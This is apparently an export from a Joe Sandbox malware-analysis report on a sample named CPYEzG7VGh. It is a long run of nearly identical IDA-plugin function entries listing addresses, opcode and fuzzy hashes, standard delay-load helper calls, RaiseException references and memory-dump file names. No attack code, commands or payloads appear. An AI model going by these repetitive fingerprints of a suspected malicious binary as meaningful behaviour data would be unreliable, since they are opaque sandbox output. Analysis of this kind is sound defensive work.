Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ba8d0b82502132d8746668ed72511c389a057d9bc1337b9861a9e60124dc4d00
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: ba8d0b82502132d8746668ed72511c389a057d9bc1337b9861a9e60124dc4d00
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1a2e9134f8b803239c5dd19ac9eda6e606ca2086b756449225987218290261d4
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: 1a2e9134f8b803239c5dd19ac9eda6e606ca2086b756449225987218290261d4
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d4308a80fe60093b73f54845f9a7ca5fc2684ff7b3a398ae3d2a0b84c999054a
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: d4308a80fe60093b73f54845f9a7ca5fc2684ff7b3a398ae3d2a0b84c999054a
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5a59ea2cff52197731045aa1e460f6489da1a39991d313b28ce02c0f6695a5d8
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: 5a59ea2cff52197731045aa1e460f6489da1a39991d313b28ce02c0f6695a5d8
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dddd6ee410aae7fb0d22aace8b4e1e0a24574bfee7ad6b56807ec241689fe1c3
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: dddd6ee410aae7fb0d22aace8b4e1e0a24574bfee7ad6b56807ec241689fe1c3
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 35dd4cb50f8cc55bd851b468a07b2ef628b2e689437c3df19c72146d7eeda0e3
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: 35dd4cb50f8cc55bd851b468a07b2ef628b2e689437c3df19c72146d7eeda0e3
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d5b44ca79a40debb8e978efec453e5e2938214e6ccb92503664de064531b4a17
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: d5b44ca79a40debb8e978efec453e5e2938214e6ccb92503664de064531b4a17
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a16bcbb6c559a1bbd1fa8d0a8b3038430d29da8836a0fb2750b3ddf9b3aa68cc
Instruction ID: 4b18b42584736103a9de3b4e82a91df272a31b75becf2582b253a139ed0b322e
Opcode Fuzzy Hash: a16bcbb6c559a1bbd1fa8d0a8b3038430d29da8836a0fb2750b3ddf9b3aa68cc
Instruction Fuzzy Hash: E0A011A22AC202BC300A3220AC0AC3A032CC8C2B20330888AF00BA80C2A88028082A30

Function 0038DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8fd132d8b64ebba8ef96818c509662cfb0d5df6c942176586f7fe2c6255417f0
Instruction ID: 2589791ec1b08c8d3a1ded221468ff4dc34a760506f4d577328d023624e23365
Opcode Fuzzy Hash: 8fd132d8b64ebba8ef96818c509662cfb0d5df6c942176586f7fe2c6255417f0
Instruction Fuzzy Hash: E0A011A22AC2023C300EB202AC02C3A032CC0C0B22330828AF00AA80CAA88808082A30

Function 0038DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f2cea6e50036a971caa92e3df209d878ae9da08fd6dd656d2b3b50e87baa510c
Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
Opcode Fuzzy Hash: f2cea6e50036a971caa92e3df209d878ae9da08fd6dd656d2b3b50e87baa510c
Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30

Function 0038DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e9e39bc3321f793951a89bf8ed7c0848237ff840d5ca74748a2e0ae00f4aa5d3
Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
Opcode Fuzzy Hash: e9e39bc3321f793951a89bf8ed7c0848237ff840d5ca74748a2e0ae00f4aa5d3
Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30

Function 0038DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 869de7cdf28a74b648b0aa3b7481eb54b5c17df0ec07ba123008daf04daab743
Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
Opcode Fuzzy Hash: 869de7cdf28a74b648b0aa3b7481eb54b5c17df0ec07ba123008daf04daab743
Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30

Function 0038DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6b2053c97e5cb0f36660d0435a0beadb49464af90938d766baa37bd793816484
Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
Opcode Fuzzy Hash: 6b2053c97e5cb0f36660d0435a0beadb49464af90938d766baa37bd793816484
Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30

Function 0038DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 45d2befa4e596b41e40393995ba2152c75f65c64ce13522b6f9171c62e3eab39
Instruction ID: 5cbc3c5573613c224f14cfcf75b69905425356f6f112e04451151004d9ae9b3a
Opcode Fuzzy Hash: 45d2befa4e596b41e40393995ba2152c75f65c64ce13522b6f9171c62e3eab39
Instruction Fuzzy Hash: AEA011A22AC202BC300E3202AC02C3A032CC0C0BA03308A8AF00A880CAA88808082A30

Function 0038DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4e5dc9f06f92aae9278422bc550a69024c042e4669c9c134089fa61d301185ba
Instruction ID: bc7875d0bde9affeaf68287894fc58dbc317caa784b6532cd483d3ecfe48a698
Opcode Fuzzy Hash: 4e5dc9f06f92aae9278422bc550a69024c042e4669c9c134089fa61d301185ba
Instruction Fuzzy Hash: 48A011AA2AC202BC300B32003C0BCBA032CC0C0B20330888AF20B880C2AA800C082230

Function 0038DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0ccb3a225530ec08dd181180d631e8257962e6a55045766ca772f8823ccd8103
Instruction ID: bc7875d0bde9affeaf68287894fc58dbc317caa784b6532cd483d3ecfe48a698
Opcode Fuzzy Hash: 0ccb3a225530ec08dd181180d631e8257962e6a55045766ca772f8823ccd8103
Instruction Fuzzy Hash: 48A011AA2AC202BC300B32003C0BCBA032CC0C0B20330888AF20B880C2AA800C082230

Function 0038DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 775e3a9b5c39671751ffe8ac6e287c3d387b7903749cdb2edf64dd3a8ba70724
Instruction ID: bc7875d0bde9affeaf68287894fc58dbc317caa784b6532cd483d3ecfe48a698
Opcode Fuzzy Hash: 775e3a9b5c39671751ffe8ac6e287c3d387b7903749cdb2edf64dd3a8ba70724
Instruction Fuzzy Hash: 48A011AA2AC202BC300B32003C0BCBA032CC0C0B20330888AF20B880C2AA800C082230

Function 0038DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DBD5

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

